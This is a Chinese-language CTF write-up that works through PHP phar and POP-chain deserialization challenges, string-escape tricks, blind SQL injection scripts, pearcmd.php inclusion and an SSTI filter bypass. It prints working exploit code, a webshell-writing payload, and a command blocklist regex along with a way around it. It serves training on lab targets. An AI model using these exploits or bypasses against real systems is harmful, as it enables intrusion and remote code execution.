12.8/复现.md
# WEEK5

## Unserialize Again

查看源代码

![image-20231127094541045](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127094541045.png)

猜测是cookie处有信息，抓包查看一下

![image-20231127094722717](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127094722717.png)

进入pairing.php查看cla

```php
 <?php
highlight_file(__FILE__);
error_reporting(0);  
class story{
    private $user='admin';
    public $pass;
    public $eating;
    public $God='false';
    public function __wakeup(){
        $this->user='human';
        if(1==1){
            die();
        }
        if(1!=1){
            echo $fffflag;
        }
    }
    public function __construct(){
        $this->user='AshenOne';
        $this->eating='fire';
        die();
    }
    public function __tostring(){
        return $this->user.$this->pass;
    }
    public function __invoke(){
        if($this->user=='admin'&&$this->pass=='admin'){
            echo $nothing;
        }
    }
    public function __destruct(){
        if($this->God=='true'&&$this->user=='admin'){
            system($this->eating);
        }
        else{
            die('Get Out!');
        }
    }
}                 
if(isset($_GET['pear'])&&isset($_GET['apple'])){
    // $Eden=new story();
    $pear=$_GET['pear'];
    $Adam=$_GET['apple'];
    $file=file_get_contents('php://input');
    file_put_contents($pear,urldecode($file));
    file_exists($Adam);
}
else{
    echo '多吃雪梨';
} 
```

看了看一些师傅的wp，发现这道题考的应该是phar反序列化：调用了“file_exists”函数，并未过滤phar流，有序列化，无"unserialize()"函数，文件上传，phar协议未过滤

### phar反序列化

#### 什么是phar

**Php ARchive**，类似于JAR的一种打包文件，将多个PHP文件打包为一个文件，可以和tar,zip互相转化（PHP >= 5.3）。

#### 文件结构

```
stub：类似于一种标志，格式为xxx<?php xxx; __HALT_COMPILER();?>，xxx不限内容，但是后文必须以__HALT_COMPILER();结尾，否则无法识别这个phar文件

manifest describing the contents（描述内容的清单）：phar文件实质上是一种压缩文件，其中每一个被压缩文件的权限、属性等信息都会放在这个部分。这个部分还会以序列化的形式存储用户自定义的meta-data，这是攻击手段的核心。

the file contents：文件内容

[optional] a signature for verifying Phar integrity (phar file format only)：可选可不选，签名，在文件末尾，根据翻译应该是分析phar文件的完整性
```

可以通过一些脚本来生成一个phar文件

```php
<?php
class Test{
    public $apple = 'good';
    public function __desturct(){
        echo 'this is destruct';
    }
}
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$test = new Test();
$phar->setMetadata($test);
$phar->addFromString('test.txt','test');
$phar->stopBuffering();
?>
```

然后用xxd查看phar文件（跟010editor差不多，用于查看文件对应的十六进制形式或者将文件对应的十六进制形式输出到一个指定的文件）

![image-20231127110952953](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127110952953.png)

然后会发现meta-data是以序列化方式来存储的

某些函数在调用这个phar文件时会将其反序列化，例如`file_get_contents()`

```php
<?php 
    class TestObject {
        public function __destruct() {
            echo 'this is destruct!';
        }
    }

    $filename = 'phar://test.phar/test.txt';
    file_get_contents($filename); 
?>
```

这里不知道是版本问题还是什么问题，我并没有调用到析构函数，不会又是版本问题吧？？？

此时就可以不通过unserialize()就可以进行反序列化操作

#### 几个例题

##### [HNCTF 2022 WEEK3]ez_phar

```php
<?php
show_source(__FILE__);
class Flag{
    public $code;
    public function __destruct(){
    // TODO: Implement __destruct() method.
        eval($this->code);
    }
}
$filename = $_GET['filename'];
file_exists($filename);
?> 
```

有`file_exists()`，那么应该就是phar反序列化了

先写一个生成phar文件的脚本

```php
<?php
class Flag{
    public $code = "system('cat /ffflllaaaggg');";
}
$a = new Flag();
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('test.txt','test');
$phar->stopBuffering();
?>
```

然后看看有没有上传点吧，dirsearch扫一下

有个upload.php

![image-20231127152708096](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127152708096.png)

后面就不截图了，把名称改成1.jpg就行。

然后就是正常的phar序列化读取

![image-20231127153443272](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127153443272.png)

至于为什么可以直接改成图片后缀，这是因为php在识别phar文件的时候主要靠的是`__HALT_COMPILER();?>`这一段代码，对前面的内容和后缀名都没有要求

##### [SWPU 2018]SimplePHP

查看源代码，似乎没有什么用处，唯一有用的几个消息是flag的位置和疑似文件包含漏洞

![image-20231127154313740](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154313740.png)

![image-20231127154324723](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154324723.png)

那就依次用这个疑似漏洞查看index.php，flag.php，upload_file.php

![image-20231127154421492](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154421492.png)

![image-20231127154446358](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154446358.png)

![image-20231127154526615](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154526615.png)

有两个额外文件，再去查看一下

function.php

```php
<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?>
```

base.php

```php+HTML
<?php 
    session_start(); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
    <meta charset="utf-8"> 
    <title>web3</title> 
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> 
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> 
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> 
</head> 
<body> 
    <nav class="navbar navbar-default" role="navigation"> 
        <div class="container-fluid"> 
        <div class="navbar-header"> 
            <a class="navbar-brand" href="index.php">首页</a> 
        </div> 
            <ul class="nav navbar-nav navbra-toggle"> 
                <li class="active"><a href="file.php?file=">查看文件</a></li> 
                <li><a href="upload_file.php">上传文件</a></li> 
            </ul> 
            <ul class="nav navbar-nav navbar-right"> 
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> 
            </ul> 
        </div> 
    </nav> 
</body> 
</html> 
<!--flag is in f1ag.php-->
```

看上去唯一的突破点在function.php中，观察发现这一段可以尝试用phar突破

```php
$filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
```

有个问题是，反序列化的点在哪呢？是用伪协议还是用反序列化？

哦，还有一个file.php忘看了

```php
<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?> 
```

class.php

```php
 <?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";//检测
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();//使$params变成数组
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?> 
```

那么最终切入点算是找到了

先看看pop链怎么构造

首先切入点选择`C1e4r`类，根据析构函数的`echo`可以得知下一个对象为`Show`，下一个则是`Test`了

脚本如下

```php
<?php
class C1e4r{
    public $test;
    public $str;
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $file;
    public $params;
}
$a = new C1e4r();
$b = new Show();
$c = new Test();
$c->params['source'] = '/var/www/html/f1ag.php';
$a->str = $b;
$b->str['str'] = $c;
$phar = new Phar('test1.phar');
$phar->startBuffering();
$phar->setStub('<? __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('test1.txt','test1');
$phar->stopBuffering();
?>
//O:5:"C1e4r":2:{s:4:"test";N;s:3:"str";O:4:"Show":2:{s:6:"source";N;s:3:"str";a:1:{s:3:"str";O:4:"Test":2:{s:4:"file";N;s:6:"params";a:1:{s:6:"source";s:22:"/var/www/html/f1ag.php";}}}}}
```

（这里我原本把phar放进010改一下的，发现根本不用，因为source为空……）

直接上传（我这里改成2.jpg，至于原因可以看看前面）

但是我们并不知道文件的名字（因为前面有一段上传之后将文件名和servername连起来进行MD5编码，破解起来似乎有点麻烦？）

看看能不能直接进/upload

![image-20231127162915274](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127162915274.png)

然后用phar读

![image-20231127164036216](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127164036216.png)

得到flag



为了进入system，我们需要让God=ture且user=admin，这个前提是你得绕过`__wakeup()`

这里的话绕过`__wakeup()`也很简单，把输出后的序列化字符串改一下属性就行

```php
<?php
class Story{
    private $user;
    public $pass;
    public $eating;
    public $God;
}
$a = new Story();
$a->user = 'admin';
$a->God = 'true';
$a->eating = 'ls /';
$phar = new Phar("exp.phar");                     //.phar文件
$phar->startBuffering(); 
$phar->setStub('<?php __HALT_COMPILER();?>');   //phar固定的格式
$phar->setMetadata($a);                       //触发的头是C1e4r类，所以传入C1e4r对象
$phar->addFromString("exp.txt", "text");          //生成签名
$phar->stopBuffering();
?>
```

生成后用010改一下属性以绕过`__wakeup()`

![image-20231127120128641](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127120128641.png)

修一下签名，脚本如下

```php
from hashlib import sha256
with open("hacker.phar",'rb') as f:
   text=f.read()
   main=text[:-40]        #正文部分(除去最后40字节)
   end=text[-8:]		  #最后八位也是不变的	
   new_sign=sha256(main).digest()
   new_phar=main+new_sign+end
   open("hacker.phar",'wb').write(new_phar) 
```

修复之后：test为签名的最后部分，所以应该是从test修到最后（不包含test）

![image-20231127120201015](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127120201015.png)

然后写一个脚本用于上传

```php
import urllib.parse
import os
import re
import requests

url='http://1c6e2942-f983-47cc-a6ef-9612e7519196.node4.buuoj.cn:81/'
pattern = r'flag\{.+?\}'
params={
    'pear':'hacker.phar', 
    'apple':'phar://hacker.phar'
}

with open('hacker.phar','rb') as fi:
    f = fi.read()
    ff=urllib.parse.quote(f)//将数据进行url编码
    fin=requests.post(url=url+"pairing.php",data=ff,params=params)
    matches = re.findall(pattern, fin.text)
    for match in matches:
        print(match)
```

flag{b78c61dd-128a-4f87-84b1-8e85744932cd}



# WEEK4

## PharOne

这题跟上个题目差不多，加了个`__HALT_COMPILER`的过滤

打开源代码发现有提示class.php

![image-20231127174240348](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127174240348.png)

依旧是简简单单一句话，unlink是删除文件

`exec`命令似乎是不回显的，因此cmd要写一个马

```php
<?php
class Flag{
    public $cmd="echo \"<?=system(\\\$_GET[1]);?>\" > /var/www/html/1.php";
}
$a = new Flag();
$phar = new Phar('test1.phar');
$phar->startBuffering();
$phar->setStub('<? __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('test1.txt','test1');
$phar->stopBuffering();
?>
```

执行之后用gzip压缩用于绕过，然后为了上传方便，改成jpg后缀

![image-20231127181427868](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127181427868.png)

上传之后进入class.php，用phar读取上传后的文件，然后进入1.php

![image-20231127183026153](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127183026153.png)

![image-20231127183009015](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127183009015.png)

![image-20231127182950425](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127182950425.png)



## 逃

这题涉及到反序列化的字符串逃逸，之前在做ctfshow的时候碰到过同类型的题，回顾一下吧

```php
<?php
highlight_file(__FILE__);
function waf($str){
    return str_replace("bad","good",$str);
}

class GetFlag {
    public $key;
    public $cmd = "whoami";
    public function __construct($key)
    {
        $this->key = $key;
    }
    public function __destruct()
    {
        system($this->cmd);
    }
}

unserialize(waf(serialize(new GetFlag($_GET['key']))));
```

这里很容易构造一个cmd，但是GetFlag里面的cmd是定死的，我们需要逃逸需要的字符串来达到getshell的目的

### 关于反序列化字符串的 逃逸

为了简便，这里就拿本题作为例子。

我们的目标是要把cmd替换成其他字符串

![image-20231208133908861](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208133908861.png)

我们的目标是要把”;s:3:"cmd";s:4:"ls /";}给逃逸出来，至于为什么要带前面的分号，先卖个关子，后面你会明白了

长度为24，我们就构造24个bad就行

![image-20231208134916459](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208134916459.png)

这里试试waf的效果

![image-20231208135129336](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208135129336.png)

发现cmd成功变成ls /，说明成功getshell

不过有点奇怪啊，ls /能执行成功，但就是不能cat /flag，怪



## More Fast

```php
 <?php
highlight_file(__FILE__);

class Start{
    public $errMsg;
    public function __destruct() {
        die($this->errMsg);
    }
}

class Pwn{
    public $obj;
    public function __invoke(){
        $this->obj->evil();
    }
    public function evil() {
        phpinfo();
    }
}

class Reverse{
    public $func;
    public function __get($var) {
        ($this->func)();
    }
}

class Web{
    public $func;
    public $var;
    public function evil() {
        if(!preg_match("/flag/i",$this->var)){
            ($this->func)($this->var);
        }else{
            echo "Not Flag";
        }
    }
}

class Crypto{
    public $obj;
    public function __toString() {
        $wel = $this->obj->good;
        return "NewStar";
    }
}

class Misc{
    public function evil() {
        echo "good job but nothing";
    }
}

$a = @unserialize($_POST['fast']);
throw new Exception("Nope"); 
```

又是一个反序列化，分析一下

切入点是Start，利用点是Web

pop链为：`__desturct()`->`__toString()`->`__get()`->`__invoke()`->`Web.evil()`

exp:

```php
<?php
class Start{
    public $errMsg;
    public function __destruct() {
        die($this->errMsg);
    }
}

class Pwn{
    public $obj;
    public function __invoke(){
        $this->obj->evil();
    }
    public function evil() {
        phpinfo();
    }
}

class Reverse{
    public $func;
    public function __get($var) {
        ($this->func)();
    }
}

class Web{
    public $func;
    public $var;
    public function evil() {
        if(!preg_match("/flag/i",$this->var)){
            ($this->func)($this->var);
        }else{
            echo "Not Flag";
        }
    }
}

class Crypto{
    public $obj;
    public function __toString() {
        $wel = $this->obj->good;
        return "NewStar";
    }
}

class Misc{
    public function evil() {
        echo "good job but nothing";
    }
}

$a = new Start();
$b = new Pwn();
$c = new Reverse();
$d = new Web();
$e = new Crypto();
$a->errMsg = $e;
$a->errMsg->obj = $c;
$a->errMsg->obj->func = $b;
$a->errMsg->obj->func->obj = $d;
$a->errMsg->obj->func->obj->func = 'system';
$a->errMsg->obj->func->obj->var = 'ls /';
echo(serialize($a));
?>
```

发现会报错

![image-20231208141212279](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208141212279.png)

最后一句话的触发条件是字符串经过反序列化之后，并且后续的析构函数不会被运行

这就相当于绕过`__wakeup()`了呗，改一下元素属性即可

![image-20231208141440029](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208141440029.png)

最后的}去掉也行



## midsql

依旧是盲注，过滤了空格，用/**/绕过

根据提示，这道题似乎没有引号闭合啥的，那就直接注

注意到没有正确错误的回显，那应该是时间盲注

```python
import requests

res = ''
last = ''
for i in range(1, 1000):
    for j in range(127, 31, -1):
        url = r'http://9575fe33-9d33-43fc-8ade-58e1ba32fd25.node4.buuoj.cn:81/?id='
        payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))>{j}),sleep(3),0)' # information_schema,mysql,performance_schema,sys,test,ctf
        # payload = rf'1/**/and/**/if((ascii(substr((select/**/database()),{i},1))>{j}),sleep(3),0)'
        # payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/"ctf"),{i},1))>{j}),sleep(3),0)'
        # payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"items"),{i},1))>{j}),sleep(3),0)' # id,name,price
        # payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(price)/**/from/**/ctf.items),{i},1))>{j}),sleep(3),0)'
        # payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(id,0x3a,name,0x3a,price)/**/from/**/ctf.items),{i},1))>{j}),sleep(3),0)'
        # payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(name)/**/from/**/ctf.items),{i},1))>{j}),sleep(4),0)'
        url = url + payload
        # print(url)
        try:
            response = requests.get(url=url, timeout=4)
        except Exception as e:
            last = res
            # print(chr(j+1))
            res += chr(j + 1)
            # print(res)
            break
    print('[*] ' + res)
```

暂时拿wp的脚本过一下，自己的脚本不知道为什么输出不了

# WEEK3

## include

先看看phpinfo有什么吧

![image-20231207114106753](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207114106753.png)

让我们看看register_argc_argv

![image-20231207114146768](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207114146768.png)

这里就要学习一下新的绕过姿势：包含pearcmd.php文件进行rce

### 关于pearcmd.php的文件包含

pear是php扩展和应用仓库，docker中默认安装，默认路径为/usr/local/lib/php。攻击者可以通过可控的`argv`参数上传恶意脚本，并包含pearcmd.php文件来达到getshell的目的

### 本地调试

由于docker的配置问题，所以只能在kali上面咯

先看看phpinfo

![image-20231207150643706](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207150643706.png)

先在上面传几个参数

![image-20231207152244630](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207152244630.png)

![image-20231207152444612](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207152444612.png)

其实你会发现，只有`+`才能将变量分离，`&`不行

我们可以看看pearcmd.php脚本

注意到57行那一部分代码

```php
$argv = Console_Getopt::readPHPArgv();
if (php_sapi_name() != 'cli' && isset($argv[1]) && $argv[1] == '--') {
    unset($argv[1]);
    $argv = array_values($argv);
}
$progname = PEAR_RUNTYPE;
array_shift($argv);
$options = Console_Getopt::getopt2($argv, "c:C:d:D:Gh?sSqu:vV");
```

`$argv`的值来源于`readPHPArgv()`，看起来应该是可控的，我们追踪一下

```php
public static function readPHPArgv()
    {
        global $argv;
        if (!is_array($argv)) {
            if (!@is_array($_SERVER['argv'])) {
                if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                    $msg = "Could not read cmd args (register_argc_argv=Off?)";
                    return PEAR::raiseError("Console_Getopt: " . $msg);
                }
                return $GLOBALS['HTTP_SERVER_VARS']['argv'];
            }
            return $_SERVER['argv'];
        }
        return $argv;
    }

}
```

果然可控，因为它读取的是`$_SERVER['argv']`与`$GLOBALS['HTTP_SERVER_VARS']['argv']`，我们在请求的时候构造一下就好。

尝试写入一句话木马

![image-20231207154847713](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207154847713.png)

![image-20231207155224058](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207155224058.png)

但由于火狐在放包过程中会进行url编码，导致<>等符号会转换成url编码，因此我们这里是看不到phpinfo()的结果

至于为什么开头有个+，可以看看之前提到的代码块

```php
$argv = Console_Getopt::readPHPArgv();
if (php_sapi_name() != 'cli' && isset($argv[1]) && $argv[1] == '--') {
    unset($argv[1]);
    $argv = array_values($argv);
}
$progname = PEAR_RUNTYPE;
array_shift($argv);
$options = Console_Getopt::getopt2($argv, "c:C:d:D:Gh?sSqu:vV");
```

注意到有一个`array_shift()`，它的作用是读取并去掉数组中的第一个元素。第一个地方放+实际上是为了传一个空变量进去

测试：

```php
<?php
$argv = array('asdsdafa',123,'fsgfsg');
foreach($argv as $str => $val){
    echo "$str : $val\n";
}
array_shift($argv);
var_dump($argv);
?>
```

输出：

![image-20231207160140506](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207160140506.png)

### 回到本题

直接上payload

![image-20231207162217481](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207162217481.png)

![image-20231207162643201](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231207162643201.png)

进行rce即可

## medium_sql

上一次做还是用sqlmap一把嗦，这次试试手动盲注

过滤了几个关键词，但是没有过滤大小写，直接绕过即可

```python
import requests

url = 'http://6bdebf20-3aeb-42c7-afa9-13c2dc54c23b.node4.buuoj.cn:81/?id=TMP0919\' '
result = ''
for i in range(1,100):
    left = 32
    right = 127
    while right > left:
        mid = (left + right) >> 1
        # payload = 'And if(aScii(suBstr((selEct database()),%d,1))>%d,1,0)--+'%(i,mid)
        # payload = 'And if(aScii(suBstr((selEct group_concat(table_name) from infOrmation_schema.tables whEre table_schema="ctf"),%d,1))>%d,1,0)--+' %(i,mid)
        # payload = 'And if(aScii(suBstr((selEct group_concat(column_name) from infOrmation_schema.columns whEre table_name="here_is_flag"),%d,1))>%d,1,0)--+' %(i,mid)
        payload = 'And if(aScii(suBstr((selEct group_concat(flag) from here_is_flag),%d,1))>%d,1,0)--+' %(i,mid)
        str = url + payload
        # print(str)
        res = requests.get(url=str)
        # print(res.text)
        if 'Physics' in res.text:
            left = mid + 1
        else:
            right = mid
        mid = (right+left) >> 1
    result += chr(mid)
    print(result)
# ctf
# grades,here_is_flag 
# flag
# flag{91de5f5b-c27f-4465-b2e6-0e1294a30cba}   
```



## POP Gadget

```php
 <?php
highlight_file(__FILE__);

class Begin{
    public $name;

    public function __destruct()
    {
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}

class Then{
    private $func;

    public function __toString()
    {
        ($this->func)();
        return "Good Job!";
    }

}

class Handle{
    protected $obj;

    public function __call($func, $vars)
    {
        $this->obj->end();
    }

}

class Super{
    protected $obj;
    public function __invoke()
    {
        $this->obj->getStr();
    }

    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    public $handle;

    public function end()
    {
        unset($this->handle->log);
    }

}

class WhiteGod{
    public $func;
    public $var;

    public function __unset($var)
    {
        ($this->func)($this->var);    
    }
}

@unserialize($_POST['pop']); 
```

这里有一个新东西，`__unset()`在对不可访问属性调用`unset()`时会被调用，而`unset()`的作用又是删除指定的变量且传回true

反着来试试：我们要利用的点在`__unset()`中，那么要用CTF类的end()函数触发；而后是用Handle类来触发；为了触发`__call()`，则需要用到Sugar类的`__invoke()`；由于Then类中有一个用到func类的方法，因此需要用到Then类；最后`__toString()`要触发，则需要Begin类中的name，因为在preg_match那，name是被当作字符串处理的。因此整体的pop链为：

`__desturct()`->`__toString()`->`__invoke()`->`__call()`->ctf.end()->`__unset()`

exp如下：（error）

```php
<?php

class Begin{
    public $name;
}

class Then{
    private $func;
}

class Handle{
    protected $obj;
}

class Super{
    protected $obj;
}

class CTF{
    public $handle;
}

class WhiteGod{
    public $func;
    public $var;
}
$a = new Begin();
$a->name = new Then();
$a->name->func = new Super();
$a->name->func->obj = new Handle();
$a->name->func->obj->obj = new CTF();
$a->name->func->obj->obj->handle = new WhiteGod();
echo(urlencode(serialize($a)));
```

为什么会报错，因为有的类里面含有private和protected属性的变量，改用construct为最佳

exp：（correct）

```php
<?php

class Begin{
    public $name;
    public function __construct(){
        $this->name = new Then();
    }
}

class Then{
    private $func;
    public function __construct(){
        $this->func = new Super();
    }
}

class Handle{
    protected $obj;
    public function __construct(){
        $this->obj = new CTF();
    }
}

class Super{
    protected $obj;
    public function __construct(){
        $this->obj = new Handle();
    }
}

class CTF{
    public $handle;
    public function __construct(){
        $this->handle = new WhiteGod();
    }
}

class WhiteGod{
    public $func;
    public $var;
    public function __construct(){
        $this->func = 'system';
        $this->var = 'ls /';
    }
}
$a = new Begin();
echo(urlencode(serialize($a)));
```

不知道为什么出不来，过一会放在本地跑跑

![image-20231208100000302](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208100000302.png)

ok，没有问题



## R!!!C!!!E!!!

纸老虎，没有过滤引号，可以转义

```php
 <?php
highlight_file(__FILE__);
class minipop{
    public $code;
    public $qwejaskdjnlka;
    public function __toString()
    {
        if(!preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $this->code)){
            exec($this->code);
        }
        return "alright";
    }
    public function __destruct()
    {
        echo $this->qwejaskdjnlka;
    }
}
if(isset($_POST['payload'])){
    //wanna try?
    unserialize($_POST['payload']);
} 
```

exp如下：

```php
<?php
class minipop{
    public $code = "ls | te''e /var/www/html/1";
    public $qwejaskdjnlka;
    public function __toString()
    {
        if(!preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $this->code)){
            exec($this->code);
        }
        return "alright";
    }
    public function __destruct()
    {
        echo $this->qwejaskdjnlka;
    }
}
$a = new minipop();
$b = new minipop();
$b->qwejaskdjnlka = "test";
$a->qwejaskdjnlka = $b;
echo(serialize($a));
?>
```



这个看看本地能不能跑，不知道为什么都不出flag了

![image-20231208101310378](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208101310378.png)

![image-20231208101224399](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208101224399.png)



## Genshin

dirsearch没有扫出来，报429

看看消息头吧，f12和抓包都行

![image-20231208101426177](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208101426177.png)

有一个secr3tofpop文件，进去看看

让我们输一个变量

![image-20231208101537188](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208101537188.png)

![image-20231208101559908](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208101559908.png)

试试有没有模板注入

![image-20231208101633582](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208101633582.png)

看样子应该是存在ssti注入

试试用{%%}执行命令

![image-20231208101817335](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231208101817335.png)

没有过滤

先fuzz一下，看看过滤了什么：`init`，`popen`，`‘`

popen过滤的话可以考虑ascii码绕过，init则可以用拼接的方法

```
?name={%print""|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr(10)|attr("__in"+"it__")|attr("__globals__")|attr("get")("__builtins__")|attr("get")("eval")("eval(chr(95)%2bchr(95)%2bchr(105)%2bchr(109)%2bchr(112)%2bchr(111)%2bchr(114)%2bchr(116)%2bchr(95)%2bchr(95)%2bchr(40)%2bchr(39)%2bchr(111)%2bchr(115)%2bchr(39)%2bchr(41)%2bchr(46)%2bchr(112)%2bchr(111)%2bchr(112)%2bchr(101)%2bchr(110)%2bchr(40)%2bchr(39)%2bchr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%2bchr(39)%2bchr(41)%2bchr(46)%2bchr(114)%2bchr(101)%2bchr(97)%2bchr(100)%2bchr(40)%2bchr(41))")%}
```

